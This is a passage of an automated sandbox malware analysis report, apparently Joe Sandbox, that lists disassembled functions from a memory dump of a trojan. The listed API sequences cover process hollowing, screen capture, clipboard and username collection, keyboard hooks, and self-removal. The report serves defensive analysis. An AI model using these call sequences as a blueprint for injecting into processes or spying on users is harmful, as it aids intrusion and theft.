                                                                                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                  Function 0044942D Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 0044944F
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 004494C7
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 004494F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 806657224-0
                                                                                                  • Opcode ID: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                  • Instruction ID: d52e19fe16dfdee109f40d049db845c42e01460133d57766726f1505d2785bee
                                                                                                  • Opcode Fuzzy Hash: aeb37be2ef55a5d103ab6b4be93faccb032caed00e04dd613037f001c8cf3bb4
                                                                                                  • Instruction Fuzzy Hash: 2D31F371904205EFDB15DF69CE8186EBBB8FF0572072446AFE024A73A1D3748D41EB28
                                                                                                  Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 2829624132-0
                                                                                                  • Opcode ID: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                  • Opcode Fuzzy Hash: 711793eb573856c12bfad09b44d2354213151b00c391b4c97ce46ce3e25352d9
                                                                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00000000), ref: 004338DA
                                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 1815803762-0
                                                                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                  Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                                  • CloseClipboard.USER32 ref: 0040B760
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Clipboard$CloseDataOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2058664381-0
                                                                                                  • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                                                                  • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                  • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                                                                  • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                  Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                  • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                                                                  • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                  • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                                                                  • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                  Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 00448301
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 1663032902-0
                                                                                                  • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                  • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                  • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                  • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                  Function 0045201B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                  • Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2692324296-0
                                                                                                  • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                  • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                  Function 004520B6 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  • Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                  • Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                  Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: NameUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 2645101109-0
                                                                                                  • Opcode ID: e75705911cc2a0b46837e609ad128fde2e6df1d534e004a7f5bb61fdffa7900c
                                                                                                  • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                                                                                  • Opcode Fuzzy Hash: e75705911cc2a0b46837e609ad128fde2e6df1d534e004a7f5bb61fdffa7900c
                                                                                                  • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                                                                                  Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                  • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1272433827-0
                                                                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1084509184-0
                                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,00475A10,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                  Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                  • String ID: DISPLAY
                                                                                                  • API String ID: 479521175-865373369
                                                                                                  • Opcode ID: a332c2859ef59da40decfcbeef2faf7b264db83c1a690ef57184ee4fa2b6b732
                                                                                                  • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                                                                  • Opcode Fuzzy Hash: a332c2859ef59da40decfcbeef2faf7b264db83c1a690ef57184ee4fa2b6b732
                                                                                                  • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                  Function 0041812A Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                  • API String ID: 4188446516-3035715614
                                                                                                  • Opcode ID: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                                                                  • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                                                                  • Opcode Fuzzy Hash: 6fe37197d8788220cf6427c040a72875e8f2824bd02e1a8f118f24072f5bfafb
                                                                                                  • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59
                                                                                                  Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
